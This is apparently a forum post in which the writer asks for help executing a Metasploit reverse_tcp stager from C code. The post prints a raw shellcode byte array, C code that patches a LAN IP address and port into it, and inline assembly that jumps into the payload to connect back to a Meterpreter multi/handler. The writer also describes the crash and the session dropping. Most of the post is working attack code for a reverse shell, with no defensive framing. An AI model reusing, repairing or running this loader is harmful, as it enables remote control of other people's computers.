Hello!

I want to execute a metasploit reverse_tcp payload from my C code, but I don't know fully how to make it work properly. Here is the sample code I use to test it:

Code:
// reverse_tcp.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"

unsigned char payload[] =
"\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d\x3c"
"\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34\x9a\x01"
"\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x43"
"\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9\x66\x8b\x1c\x59"
"\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c\x24\x1c\x61\xff\xe0"
"\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68"
"\x08\x5e\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\x66"
"\xb9\x72\x60\xff\xd6\x95\x53\x53\x53\x53\x43\x53\x43\x53\x89"
"\xe7\x66\x81\xef\x08\x02\x57\x53\x66\xb9\xe7\xdf\xff\xd6\x66"
"\xb9\xa8\x6f\xff\xd6\x97\x68\xc0\xa8\x01\x0a\x66\x68\x11\x5c"
"\x66\x53\x89\xe3\x6a\x10\x53\x57\x66\xb9\x57\x05\xff\xd6\x50"
"\xb4\x0c\x50\x53\x57\x53\x66\xb9\xc0\x38\xff\xe6";

int main(int argc, char* argv[])
{
	char ip[] = { 192, 168, 1, 213 };
	char port[] = { 0x11, 0x5C };

	memcpy( payload + 142, ip, 4 );
	memcpy( payload + 148, port, 2 );

	_asm {
		lea eax, payload
			call eax
}

	printf( "started.\n" );
	while(1)
	{
		Sleep(100);
	}

	return 0;
}
That code will raise an exception that it can't read address 0xffffffff. I tried using try-catch blocks and it made it not crash, but anyway Metasploit multi/handler gets stuck on "Upload completed" (I want to use meterpreter payload for uploading) and nothing happens after that. __try-__except blocks also didn't do the trick. The session will open when I exit the program, but it will close immediatelly afterwards.
Probably you know much better how to call the payload properly in C code to make it work properly.

Regards,
Black Dot